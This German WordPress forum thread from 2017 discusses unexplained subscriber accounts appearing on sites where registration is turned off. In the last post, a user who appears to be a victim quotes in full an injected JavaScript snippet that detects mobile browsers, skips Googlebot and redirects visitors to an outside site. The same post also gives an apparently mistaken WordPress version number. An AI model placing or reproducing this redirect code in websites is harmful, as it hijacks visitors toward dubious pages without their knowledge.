1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Abonnenten obwohl Funktion abgeschaltet

Dieses Thema im Forum "Allgemeines" wurde erstellt von schrulla_online, 15. Februar 2017.

Schlagworte:
  1. schrulla_online

    schrulla_online Well-Known Member

    Registriert seit:
    31. März 2011
    Beiträge:
    248
    Zustimmungen:
    0
    WordPress 4.7.2 / Hallo, beim Überprüfen der Benutzer habe ich festgestellt, dass sich dort Abonnenten eingeschlichen hatten, obwohl ich die Mitgliedschaft (jeder kann sich registrieren) nicht angehakt hatte. Könnte mir jemand schreiben, ob ich etwas übersehen habe? Vielen Dank schon mal!
     
  2. mkronenfeld

    mkronenfeld Well-Known Member

    Registriert seit:
    10. Oktober 2016
    Beiträge:
    227
    Zustimmungen:
    0
    Kannst du ausschließen, dass es sich um alte Abonnenten handelt?

    Poste hier doch einfach mal einen Link zu deiner Seite und einen Screenshot von deinen Einstellungen (Allgemein > Abschnitt "Mitgliedschaft").

    LG
    Marvin
     
  3. schrulla_online

    schrulla_online Well-Known Member

    Registriert seit:
    31. März 2011
    Beiträge:
    248
    Zustimmungen:
    0
    Hallo, ich kann dies nicht ausschließen, bin gerade erst drauf gestoßen und habe sie auch gelöscht. www.trautmann-umzuege.de
    Abonnenten1.JPG
     
  4. mkronenfeld

    mkronenfeld Well-Known Member

    Registriert seit:
    10. Oktober 2016
    Beiträge:
    227
    Zustimmungen:
    0
    Habe mich ein wenig durch die Seite geklickt und nichts Offensichtliches gefunden. Weder die Login Maske, noch der Kommentarbereich lassen eine Registrierung zu.

    Wenn keine neuen Abonnenten auftauchen, würde ich es unter Altlasten einordnen.
     
  5. schrulla_online

    schrulla_online Well-Known Member

    Registriert seit:
    31. März 2011
    Beiträge:
    248
    Zustimmungen:
    0
    Ja - könnte sein. Ich werde es beobachten. Vielen Dank fürs Nachschauen!
     
  6. matrix-22

    matrix-22 Well-Known Member

    Registriert seit:
    30. September 2010
    Beiträge:
    1.255
    Zustimmungen:
    7
    Vielleicht hat Deine Agentur da etwas gemacht.
    Über die /wp-admin Seite kommt ja Eure Agentur https://www.websplash.de/
    Haben die vielleicht mal was getestet etc.
     
  7. bauli

    bauli Member

    Registriert seit:
    19. Februar 2017
    Beiträge:
    10
    Zustimmungen:
    0
    gute Tag

    Leider ist das auch auf unserer Webseite schon mehrmals der Fall gewesen, zuletzt vor 2 Tagen und definitv KEIN altes Relikt.
    Auch auf unserer Seite ist unter Allgmein/Einstellungen das "jeder kann sich registrieren" NICHT angehakt.
    Zudem beinhaltet die Webseite nur statische <Seiten> und keine <Beiträge>, bietet demzufolge auch nirgends die Möglichkeit an, sich überhaupt zu registrieren.

    Leider wurde hier zusätzlich auch versucht, alle Seiten mit Schadcode zu infiszieren, indem auf jeder Seite eine Script dazugefügt wurde, der offenbar speziell Handies auf irgendwelche anrüchigen Seiten weiterleitet. Aufgefallen ist es nur, weil dieser code auf einigen seiten unkomplett installiert wurde und daher als Text sichtbar war.

    inhalt des Codes:
    --------------------
    if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}
    --------------------
    jeweils am Seitenende zwischen <script> </script> eingebettet

    hat jemand ähnliche Erfahrungen?

    (ja, ich benutze die letzte Version Wordpress 7.1.2, wo angebliche Sicherheitslöcher geflickt wurden)

    lg
    bauli
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden